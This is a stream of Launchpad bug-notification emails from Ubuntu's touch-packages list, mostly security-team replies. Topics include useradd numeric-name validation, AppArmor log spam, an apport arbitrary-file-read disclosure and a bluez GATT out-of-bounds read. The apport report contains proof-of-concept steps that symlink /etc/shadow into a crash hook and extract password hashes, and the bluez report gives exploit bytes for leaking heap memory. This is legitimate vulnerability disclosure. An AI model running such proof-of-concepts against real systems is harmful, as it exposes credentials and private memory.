  InstallationDate: Installed on 2012-10-07 (876 days ago)
  InstallationMedia: Ubuntu 12.10 "Quantal Quetzal" - Beta amd64 (20121007)
  PackageArchitecture: allSourcePackage: apport
  UpgradeStatus: Upgraded to vivid on 2013-05-07 (665 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1427600/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1937071] Re: package initramfs-tools 0.136ubuntu6.6 failed to install/upgrade: installed initramfs-tools package post-installation script subprocess returned error exit status 1

2021-07-21 Thread Seth Arnold
Hello Rucel, my guess is you've installed the lilo package. This is not
supported. If you can identify a bugfix it could probably be integrated
but honestly it'd be easier to either figure out how to use grub in your
environment or switch to another distribution that does support using
lilo. Grub just works for most people, and it should work for you, too.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to initramfs-tools in Ubuntu.
https://bugs.launchpad.net/bugs/1937071

Title:
  package initramfs-tools 0.136ubuntu6.6 failed to install/upgrade:
  installed initramfs-tools package post-installation script subprocess
  returned error exit status 1

Status in initramfs-tools package in Ubuntu:
  New

Bug description:
  it does not complete the update

  ProblemType: Package
  DistroRelease: Ubuntu 20.04
  Package: initramfs-tools 0.136ubuntu6.6
  ProcVersionSignature: Ubuntu 5.4.0-77.86-generic 5.4.119
  Uname: Linux 5.4.0-77-generic x86_64
  ApportVersion: 2.20.11-0ubuntu27.18
  Architecture: amd64
  CasperMD5CheckResult: skip
  Date: Wed Jul 21 19:16:15 2021
  ErrorMessage: installed initramfs-tools package post-installation script 
subprocess returned error exit status 1
  InstallationDate: Installed on 2018-07-28 (1089 days ago)
  InstallationMedia: Ubuntu 18.04 LTS "Bionic Beaver" - Release amd64 (20180426)
  PackageArchitecture: all
  Python3Details: /usr/bin/python3.8, Python 3.8.10, python3-minimal, 
3.8.2-0ubuntu2
  PythonDetails: N/A
  RelatedPackageVersions:
   dpkg 1.19.7ubuntu3
   apt  2.0.6
  SourcePackage: initramfs-tools
  Title: package initramfs-tools 0.136ubuntu6.6 failed to install/upgrade: 
installed initramfs-tools package post-installation script subprocess returned 
error exit status 1
  UpgradeStatus: Upgraded to focal on 2020-10-05 (288 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/initramfs-tools/+bug/1937071/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1937071] Re: package initramfs-tools 0.136ubuntu6.6 failed to install/upgrade: installed initramfs-tools package post-installation script subprocess returned error exit status 1

2021-07-21 Thread Seth Arnold
** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to initramfs-tools in Ubuntu.
https://bugs.launchpad.net/bugs/1937071

Title:
  package initramfs-tools 0.136ubuntu6.6 failed to install/upgrade:
  installed initramfs-tools package post-installation script subprocess
  returned error exit status 1

Status in initramfs-tools package in Ubuntu:
  New

Bug description:
  it does not complete the update

  ProblemType: Package
  DistroRelease: Ubuntu 20.04
  Package: initramfs-tools 0.136ubuntu6.6
  ProcVersionSignature: Ubuntu 5.4.0-77.86-generic 5.4.119
  Uname: Linux 5.4.0-77-generic x86_64
  ApportVersion: 2.20.11-0ubuntu27.18
  Architecture: amd64
  CasperMD5CheckResult: skip
  Date: Wed Jul 21 19:16:15 2021
  ErrorMessage: installed initramfs-tools package post-installation script 
subprocess returned error exit status 1
  InstallationDate: Installed on 2018-07-28 (1089 days ago)
  InstallationMedia: Ubuntu 18.04 LTS "Bionic Beaver" - Release amd64 (20180426)
  PackageArchitecture: all
  Python3Details: /usr/bin/python3.8, Python 3.8.10, python3-minimal, 
3.8.2-0ubuntu2
  PythonDetails: N/A
  RelatedPackageVersions:
   dpkg 1.19.7ubuntu3
   apt  2.0.6
  SourcePackage: initramfs-tools
  Title: package initramfs-tools 0.136ubuntu6.6 failed to install/upgrade: 
installed initramfs-tools package post-installation script subprocess returned 
error exit status 1
  UpgradeStatus: Upgraded to focal on 2020-10-05 (288 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/initramfs-tools/+bug/1937071/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1927078] Re: Don't allow useradd to use fully numeric names

2021-07-07 Thread Seth Arnold
Beautiful, thanks for the large range of tests :)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/1927078

Title:
  Don't allow useradd to use fully numeric names

Status in shadow package in Ubuntu:
  New
Status in shadow source package in Focal:
  New
Status in shadow source package in Groovy:
  New
Status in shadow source package in Hirsute:
  New
Status in shadow source package in Impish:
  New

Bug description:
  [Description]

  Fully numeric names support in Ubuntu is inconsistent in Focal onwards
  because systemd does not like them[1] but are still allowed by default
  by useradd, leaving the session behavior in hands of the running
  applications. Two examples:

  1. After creating a user named "0", the user can log in via ssh or
  console but loginctl won't create a session for it:

  root@focal:/home/ubuntu# useradd -m 0
  root@focal:/home/ubuntu# id 0
  uid=1005(0) gid=1005(0) groups=1005(0)

  ..

  0@192.168.122.6's password:
  Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.8.0-48-generic x86_64)

  Last login: Thu Apr  8 16:17:06 2021 from 192.168.122.1
  $ loginctl
  No sessions.
  $ w
   16:20:09 up 4 min,  1 user,  load average: 0.03, 0.14, 0.08
  USER TTY  FROM LOGIN@   IDLE   JCPU   PCPU WHAT
  0pts/0192.168.122.116:170.00s  0.00s  0.00s w  

  And pam-systemd shows the following message:

  Apr 08 16:17:06 focal sshd[1584]: pam_unix(sshd:session): session opened for 
user 0 by (uid=0)
  Apr 08 16:17:06 focal sshd[1584]: pam_systemd(sshd:session): pam-systemd 
initializing
  Apr 08 16:17:06 focal sshd[1584]: pam_systemd(sshd:session): Failed to get 
user record: Invalid argument

  
  2. With that same username, every successful authentication in gdm will loop 
back to gdm again instead of starting gnome, making the user unable to login.

  
  Making useradd fail (unless --badnames is set) when a fully numeric name is 
used will make the default OS behavior consistent.

  
  [Other info]

  - Upstream does not support fully numeric usernames
  - useradd has a --badnames parameter that would still allow the use of these 
type of names

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1927078/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1927078] Re: Don't allow useradd to use fully numeric names

2021-06-17 Thread Seth Arnold
Ah, that explains that.

Would you mind adding tests for a few more usernames?

0root
0
00
0.0
0x0
0-0
0_0
0.o
0xo
0-o
0_o

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/1927078

Title:
  Don't allow useradd to use fully numeric names

Status in shadow package in Ubuntu:
  New
Status in shadow source package in Focal:
  New
Status in shadow source package in Groovy:
  New
Status in shadow source package in Hirsute:
  New
Status in shadow source package in Impish:
  New

Bug description:
  [Description]

  Fully numeric names support in Ubuntu is inconsistent in Focal onwards
  because systemd does not like them[1] but are still allowed by default
  by useradd, leaving the session behavior in hands of the running
  applications. Two examples:

  1. After creating a user named "0", the user can log in via ssh or
  console but loginctl won't create a session for it:

  root@focal:/home/ubuntu# useradd -m 0
  root@focal:/home/ubuntu# id 0
  uid=1005(0) gid=1005(0) groups=1005(0)

  ..

  0@192.168.122.6's password:
  Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.8.0-48-generic x86_64)

  Last login: Thu Apr  8 16:17:06 2021 from 192.168.122.1
  $ loginctl
  No sessions.
  $ w
   16:20:09 up 4 min,  1 user,  load average: 0.03, 0.14, 0.08
  USER TTY  FROM LOGIN@   IDLE   JCPU   PCPU WHAT
  0pts/0192.168.122.116:170.00s  0.00s  0.00s w  

  And pam-systemd shows the following message:

  Apr 08 16:17:06 focal sshd[1584]: pam_unix(sshd:session): session opened for 
user 0 by (uid=0)
  Apr 08 16:17:06 focal sshd[1584]: pam_systemd(sshd:session): pam-systemd 
initializing
  Apr 08 16:17:06 focal sshd[1584]: pam_systemd(sshd:session): Failed to get 
user record: Invalid argument

  
  2. With that same username, every successful authentication in gdm will loop 
back to gdm again instead of starting gnome, making the user unable to login.

  
  Making useradd fail (unless --badnames is set) when a fully numeric name is 
used will make the default OS behavior consistent.

  
  [Other info]

  - Upstream does not support fully numeric usernames
  - useradd has a --badnames parameter that would still allow the use of these 
type of names

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1927078/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1932342] Re: Feature Request: Rate limit apparmor denial logs

2021-06-17 Thread Seth Arnold
See also https://github.com/snapcrafters/discord/issues/23 -- there may
be some other advice buried in there on how to deal with the deluge
while also not giving discord permission to see all the processes you're
running.

Thanks

** Bug watch added: github.com/snapcrafters/discord/issues #23
   https://github.com/snapcrafters/discord/issues/23

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1932342

Title:
  Feature Request: Rate limit apparmor denial logs

Status in apparmor package in Ubuntu:
  Confirmed

Bug description:
  While running Discord, AppArmor prints a ton of denials every second.
  The lines look something like this:

  > Jun 17 18:00:14 magni audit[267198]: AVC apparmor="DENIED"
  operation="ptrace" profile="snap.discord.discord" pid=267198
  comm="Discord" requested_mask="read" denied_mask="read"
  peer="unconfined"

  I'm thankful that AppArmor is preventing it from using pthread to mess
  with my system. However, I wish it didn't spam my logs so much. Would
  it be possible to implement a system whereby subsequent identical logs
  within the same second are deduplicated? For example, instead of 127
  separate denials lines, one second could look like this:

  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" 
operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" 
requested_mask="read" denied_mask="read" peer="unconfined"
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="open" 
profile="snap.discord.discord" name="/proc/1383/cmdline" pid=267198 
comm="Discord" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" 
operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" 
requested_mask="read" denied_mask="read" peer="unconfined"
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" [3 identical 
messages omitted]
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="open" 
profile="snap.discord.discord" name="/proc/1407/cmdline" pid=267198 
comm="Discord" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" 
operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" 
requested_mask="read" denied_mask="read" peer="unconfined"
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" [48 identical 
messages omitted]
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" 
operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" 
requested_mask="read" denied_mask="read" peer="snap.snap-store.ubuntu-software"
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" 
operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" 
requested_mask="read" denied_mask="read" peer="unconfined"
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" [15 identical 
messages omitted]
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" 
operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" 
requested_mask="read" denied_mask="read" peer="docker-default"
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" 
operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" 
requested_mask="read" denied_mask="read" peer="unconfined"
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="open" 
profile="snap.discord.discord" name="/proc/14296/cmdline" pid=267198 
comm="Discord" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" 
operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" 
requested_mask="read" denied_mask="read" peer="unconfined"
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" [8 identical 
messages omitted]
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="open" 
profile="snap.discord.discord" name="/proc/93917/cmdline" pid=267198 
comm="Discord" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" 
operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" 
requested_mask="read" denied_mask="read" peer="unconfined"
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" [40 identical 
messages omitted]

  Of course, it would've been nice if Discord wasn't persistently trying
  to ptrace everything on my system all the time even after being
  denied, but AppArmor exists to deal with misbehaving applications, so
  we kinda have to expect that the applications it deals with will be
  misbehaving.

  ProblemType: Bug
  DistroRelease: Ubuntu 21.04
  Package: apparmor 3.0.0-0ubuntu7
  ProcVersionSignature: Ubuntu 5.11.0-18.19-generic 5.11.17
  Uname: Linux 5.11.0-18-generic x86_64
  

[Touch-packages] [Bug 1927078] Re: Don't allow useradd to use fully numeric names

2021-06-16 Thread Seth Arnold
Heh, a comment in Jawn's debdiff:

 * User/group names must match [a-z_][a-z0-9_-]*[$]

I found period also worked fine:

root@u20:~# useradd 0.0
root@u20:~# getent passwd 0.0
0.0:x:1001:1001::/home/0.0:/bin/sh
root@u20:~# userdel 0.0
root@u20:~# getent passwd 0.0
root@u20:~# exit

I know comments are almost always out of date by the time I read them,
but this one seems wronger than usual. :)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/1927078

Title:
  Don't allow useradd to use fully numeric names

Status in shadow package in Ubuntu:
  New
Status in shadow source package in Focal:
  New
Status in shadow source package in Groovy:
  New
Status in shadow source package in Hirsute:
  New
Status in shadow source package in Impish:
  New

Bug description:
  [Description]

  Fully numeric names support in Ubuntu is inconsistent in Focal onwards
  because systemd does not like them[1] but are still allowed by default
  by useradd, leaving the session behavior in hands of the running
  applications. Two examples:

  1. After creating a user named "0", the user can log in via ssh or
  console but loginctl won't create a session for it:

  root@focal:/home/ubuntu# useradd -m 0
  root@focal:/home/ubuntu# id 0
  uid=1005(0) gid=1005(0) groups=1005(0)

  ..

  0@192.168.122.6's password:
  Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.8.0-48-generic x86_64)

  Last login: Thu Apr  8 16:17:06 2021 from 192.168.122.1
  $ loginctl
  No sessions.
  $ w
   16:20:09 up 4 min,  1 user,  load average: 0.03, 0.14, 0.08
  USER TTY  FROM LOGIN@   IDLE   JCPU   PCPU WHAT
  0pts/0192.168.122.116:170.00s  0.00s  0.00s w  

  And pam-systemd shows the following message:

  Apr 08 16:17:06 focal sshd[1584]: pam_unix(sshd:session): session opened for 
user 0 by (uid=0)
  Apr 08 16:17:06 focal sshd[1584]: pam_systemd(sshd:session): pam-systemd 
initializing
  Apr 08 16:17:06 focal sshd[1584]: pam_systemd(sshd:session): Failed to get 
user record: Invalid argument

  
  2. With that same username, every successful authentication in gdm will loop 
back to gdm again instead of starting gnome, making the user unable to login.

  
  Making useradd fail (unless --badnames is set) when a fully numeric name is 
used will make the default OS behavior consistent.

  
  [Other info]

  - Upstream does not support fully numeric usernames
  - useradd has a --badnames parameter that would still allow the use of these 
type of names

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1927078/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


Re: [Touch-packages] [Bug 1927078] Re: Don't allow useradd to use fully numeric names

2021-06-16 Thread Seth Arnold
On Wed, Jun 16, 2021 at 09:15:32PM -, Steve Langasek wrote:
> Disallowing leading numeric digits entirely would, unfortunately,
> disable a significant class of valid usernames in conflict with
> historical usage.

Admins are still able to hand-edit /etc/passwd, /etc/shadow, and mv
home directory names if they've got a good enough reason to use such
names and trust their software to do the right thing.

> The main motivation in fixing this is that allowing fully-numeric
> usernames means there is ambiguity in contexts that can reference both
> uids and usernames and do not have strong typing.  Aside from systemd,
> this is mostly about shells and invocations of various commandline
> tools; and neither bash nor the tools appear to interpret 0o0 or 0x0 as
> numbers:

I was thinking primarily of perl, here:

$ sudo perl -e 'print "muahaa\n" if $< == "0x0";'
muahaa

You could argue that wherever "0x0" came from in this perl program should
have kept track if it received a number or a name, but the language sure
doesn't help.

C examples are less compelling because it has types but the atoi(3)
and strtoul(3) APIs make it very easy to parse something like "2build"
or "4fun" or "0x0" into an integer. (strtol(3) has a nice example.)

> Let's please focus on the known problem case of all-numeric usernames.
> If there are other confirmed security issues with octal/hex
> representations of numbers, then we should also close those, but it
> needs a more precise fix than disabling leading digits.

How strongly do you feel about this? I can see where you're coming from,
but given (a) the escape hatch mechanism to 'break the rules' isn't too
onerous (b) the ease with which brittle code can be written (c) the
simplicity of 'deny leading digit' compared against 'make sure there's at
least one non-digit' or 'make sure there's at least one letter' etc I
prefer the simpler rule.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/1927078

Title:
  Don't allow useradd to use fully numeric names

Status in shadow package in Ubuntu:
  New
Status in shadow source package in Focal:
  New
Status in shadow source package in Groovy:
  New
Status in shadow source package in Hirsute:
  New
Status in shadow source package in Impish:
  New

Bug description:
  [Description]

  Fully numeric names support in Ubuntu is inconsistent in Focal onwards
  because systemd does not like them[1] but are still allowed by default
  by useradd, leaving the session behavior in hands of the running
  applications. Two examples:

  1. After creating a user named "0", the user can log in via ssh or
  console but loginctl won't create a session for it:

  root@focal:/home/ubuntu# useradd -m 0
  root@focal:/home/ubuntu# id 0
  uid=1005(0) gid=1005(0) groups=1005(0)

  ..

  0@192.168.122.6's password:
  Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.8.0-48-generic x86_64)

  Last login: Thu Apr  8 16:17:06 2021 from 192.168.122.1
  $ loginctl
  No sessions.
  $ w
   16:20:09 up 4 min,  1 user,  load average: 0.03, 0.14, 0.08
  USER TTY  FROM LOGIN@   IDLE   JCPU   PCPU WHAT
  0pts/0192.168.122.116:170.00s  0.00s  0.00s w  

  And pam-systemd shows the following message:

  Apr 08 16:17:06 focal sshd[1584]: pam_unix(sshd:session): session opened for 
user 0 by (uid=0)
  Apr 08 16:17:06 focal sshd[1584]: pam_systemd(sshd:session): pam-systemd 
initializing
  Apr 08 16:17:06 focal sshd[1584]: pam_systemd(sshd:session): Failed to get 
user record: Invalid argument

  
  2. With that same username, every successful authentication in gdm will loop 
back to gdm again instead of starting gnome, making the user unable to login.

  
  Making useradd fail (unless --badnames is set) when a fully numeric name is 
used will make the default OS behavior consistent.

  
  [Other info]

  - Upstream does not support fully numeric usernames
  - useradd has a --badnames parameter that would still allow the use of these 
type of names

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1927078/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1917904] Re: Arbitrary file reads

2021-06-11 Thread Seth Arnold
** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1917904

Title:
  Arbitrary file reads

Status in apport package in Ubuntu:
  Fix Released
Status in apport source package in Bionic:
  Fix Released
Status in openjdk-lts source package in Bionic:
  New
Status in apport source package in Focal:
  Fix Released
Status in openjdk-lts source package in Focal:
  New
Status in apport source package in Groovy:
  Fix Released
Status in openjdk-lts source package in Groovy:
  New
Status in apport source package in Hirsute:
  Fix Released
Status in openjdk-lts source package in Hirsute:
  New
Status in apport source package in Impish:
  Fix Released
Status in openjdk-lts source package in Impish:
  New

Bug description:
  # Vulnerabilities in Apport
  During a cursory code review, several potential security issues in `apport` 
and crash-related hooks in packages such as `Xorg` and `openjdk-14-lts` have 
been identified.

  While the issue regarding the `openjdk-14-lts` package is exploitable
  on default installations, the remaining issues most likely are mitigated by 
the sysctl setting `fs.protected_symlinks` on default Ubuntu installations.

  With regard to issues mitigated by `fs.protected_symlinks`, it is not
  clear if they are considered to be part of the threat model, but
  nonetheless will be included in this report. Further, if the issues
  regarding package hooks should be reported in the corresponding
  packages' bug tracker, please let me know.

  ## Issue 1: Arbitrary file read in package-hooks/source_openjdk-*.py
  The `add_info()` function allows for a directory traversal by building a file 
path using user-controlled data without properly sanitizing the resulting path.

  ```Python
  def add_info(report, ui=None):
  if report['ProblemType'] == 'Crash' and 'ProcCwd' in report:
  # attach hs_err_.pid file
  cwd = report['ProcCwd']
  pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
  if pid_line:
  pid = pid_line.groups()[0]
  path = "%s/hs_err_pid%s.log" % (cwd, pid)
  # make sure if exists
  if os.path.exists(path):
  content = read_file(path)
  # truncate if bigger than 100 KB
  # see LP: #1696814
  max_length = 100*1024
  if sys.getsizeof(content) < max_length:
  report['HotspotError'] = content
  report['Tags'] += ' openjdk-hs-err'
  else:
  report['HotspotError'] = content[:max_length] + \
  "\n[truncated by openjdk-11 apport hook]" + \
  "\n[max log size is %s, file size was %s]" % \
  (si_units(max_length), 
si_units(sys.getsizeof(content)))
  report['Tags'] += ' openjdk-hs-err'
  ```

  By injecting a `ProcCwd` such as `/home/user/` and a `Pid` such as
  `0`, the function includes an arbitrary file by following a potential
  symbolic link `/home/user/hs_err_pid0.log`.

  ### PoC
  ```
  $ sudo apt install openjdk-14-jdk

  $ sudo sysctl fs.protected_symlinks
  fs.protected_symlinks = 1

  $ ln -s /etc/shadow /home/user/hs_err_pid0.log

  $ pid=$'\t0';cat << EOF > /var/crash/poc.crash
  ProblemType: Crash
  ExecutablePath: /poc
  Package: openjdk-lts 123
  SourcePackage: openjdk-lts
  ProcCwd: /home/user
  ProcStatus:
   Pid:$pid
   Uid:$pid
  EOF

  $ grep -A3 root: /var/crash/poc.crash
   root:!:18393:0:9:7:::
   daemon:*:18375:0:9:7:::
   bin:*:18375:0:9:7:::
   sys:*:18375:0:9:7:::
  ```

  ## Issue 2: Arbitrary file read in package-hooks/source_xorg.py (Info)
  The root cause of this issue stems from the fact, that a potentially
  user-controlled file in the `/tmp` directory is not checked for being a 
symbolic link and therefore might allow including arbitrary files in the 
processed crash report:

  Note: Requires `fs.protected_symlinks=0`

  ```Python
  def attach_3d_info(report, ui=None):
  ...

  # Compiz internal state if compiz crashed
  if True or report.get('SourcePackage','Unknown') == "compiz" and 
"ProcStatus" in report:
  compiz_pid = 0
  pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
  if pid_line:
  compiz_pid = pid_line.groups()[0]
  compiz_state_file = '/tmp/compiz_internal_state%s' % compiz_pid
  attach_file_if_exists(report, compiz_state_file, 
"compiz_internal_states")
  ```

  ### PoC
  ```
  $ sudo sysctl fs.protected_symlinks=0
  fs.protected_symlinks = 0

  $ ln -s /etc/shadow /tmp/compiz_internal_state0

  $ cat << EOF > /var/crash/poc.crash
  ProblemType: Crash
  ExecutablePath: /poc
  Package: source_xorg 123
  SourcePackage: compiz
  

[Touch-packages] [Bug 1926548] Re: The gatt protocol has out-of-bounds read that leads to information leakage

2021-06-09 Thread Seth Arnold
Wonderful, thanks Daniel!

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to bluez in Ubuntu.
https://bugs.launchpad.net/bugs/1926548

Title:
  The gatt protocol has out-of-bounds read that leads to information
  leakage

Status in Bluez Utilities:
  Fix Released
Status in bluez package in Ubuntu:
  Fix Released
Status in bluez source package in Hirsute:
  Fix Released
Status in bluez source package in Impish:
  Fix Released

Bug description:
  I installed the latest bluez 5.53-0ubuntu3 version using apt-get install. It 
seems that this vulnerability was silently fixed in the latest bluez5.8, and 
the cve number was not assigned.
  But this vulnerability now affects the latest ubuntu system
  This vulnerability allows an attacker to remotely obtain most of the contents 
of the heap without authentication.
  The vulnerability code is stored in cli_feat_read_cb, this function does not 
verify the offset parameter
  The vulnerability code is as follows

  gatt-database.c

  1054:static void cli_feat_read_cb(struct gatt_db_attribute *attrib,
unsigned int id, uint16_t offset,
uint8_t opcode, struct bt_att *att,
void *user_data){
  ...
  len = sizeof(state->cli_feat)-offset;
  value = len? >cli_feat[offset]: NULL;

  done:
  gatt_db_attribute_read_result(attrib, id, ecode, value, len);

  
  }
  len will become very large due to integer overflow, so that a message of mtu 
(0x90) size will be sent later
  The message content is the buffer pointed to by value, which can be most 
addresses on the heap

  poc is very simple, the core is this line of code

  memcpy([0],"\x0c\x0b\x00\x0d\x00",5);

  0xc stands for read
  \x0b\x00 represents the handle of the client feature, which can be obtained 
through the find info message, which seems to be 0b by default
  \x0d\x00 is offset0xd

  
  this vulnerability is serious
  I want to apply for a cve number, although this has been silently fixed in 
the latest version

To manage notifications about this bug go to:
https://bugs.launchpad.net/bluez/+bug/1926548/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1926548] Re: The gatt protocol has out-of-bounds read that leads to information leakage

2021-06-09 Thread Seth Arnold
Daniel, are you sure about that fixed-in-5.56 bug tag? I can't spot the
referenced commit in the tarballs 5.55, 5.56, 5.57, 5.58 from:
http://www.bluez.org/

nor in the github sources:
https://github.com/bluez/bluez/blob/master/src/gatt-database.c#L1054

nor the kernel.org sources:
https://git.kernel.org/pub/scm/bluetooth/bluez.git/tree/src/gatt-database.c#n1054

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to bluez in Ubuntu.
https://bugs.launchpad.net/bugs/1926548

Title:
  The gatt protocol has out-of-bounds read that leads to information
  leakage

Status in Bluez Utilities:
  Fix Released
Status in bluez package in Ubuntu:
  Fix Released
Status in bluez source package in Hirsute:
  Fix Released
Status in bluez source package in Impish:
  Fix Released

Bug description:
  I installed the latest bluez 5.53-0ubuntu3 version using apt-get install. It 
seems that this vulnerability was silently fixed in the latest bluez5.8, and 
the cve number was not assigned.
  But this vulnerability now affects the latest ubuntu system
  This vulnerability allows an attacker to remotely obtain most of the contents 
of the heap without authentication.
  The vulnerability code is stored in cli_feat_read_cb, this function does not 
verify the offset parameter
  The vulnerability code is as follows

  gatt-database.c

  1054:static void cli_feat_read_cb(struct gatt_db_attribute *attrib,
unsigned int id, uint16_t offset,
uint8_t opcode, struct bt_att *att,
void *user_data){
  ...
  len = sizeof(state->cli_feat)-offset;
  value = len? >cli_feat[offset]: NULL;

  done:
  gatt_db_attribute_read_result(attrib, id, ecode, value, len);

  
  }
  len will become very large due to integer overflow, so that a message of mtu 
(0x90) size will be sent later
  The message content is the buffer pointed to by value, which can be most 
addresses on the heap

  poc is very simple, the core is this line of code

  memcpy([0],"\x0c\x0b\x00\x0d\x00",5);

  0xc stands for read
  \x0b\x00 represents the handle of the client feature, which can be obtained 
through the find info message, which seems to be 0b by default
  \x0d\x00 is offset0xd

  
  this vulnerability is serious
  I want to apply for a cve number, although this has been silently fixed in 
the latest version

To manage notifications about this bug go to:
https://bugs.launchpad.net/bluez/+bug/1926548/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1926548] Re: The gatt protocol has out-of-bounds read that leads to information leakage

2021-06-08 Thread Seth Arnold
** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to bluez in Ubuntu.
https://bugs.launchpad.net/bugs/1926548

Title:
  The gatt protocol has out-of-bounds read that leads to information
  leakage

Status in bluez package in Ubuntu:
  New

Bug description:
  I installed the latest bluez 5.53-0ubuntu3 version using apt-get install. It 
seems that this vulnerability was silently fixed in the latest bluez5.8, and 
the cve number was not assigned.
  But this vulnerability now affects the latest ubuntu system
  This vulnerability allows an attacker to remotely obtain most of the contents 
of the heap without authentication.
  The vulnerability code is stored in cli_feat_read_cb, this function does not 
verify the offset parameter
  The vulnerability code is as follows

  gatt-database.c

  1054:static void cli_feat_read_cb(struct gatt_db_attribute *attrib,
unsigned int id, uint16_t offset,
uint8_t opcode, struct bt_att *att,
void *user_data){
  ...
  len = sizeof(state->cli_feat)-offset;
  value = len? >cli_feat[offset]: NULL;

  done:
  gatt_db_attribute_read_result(attrib, id, ecode, value, len);

  
  }
  len will become very large due to integer overflow, so that a message of mtu 
(0x90) size will be sent later
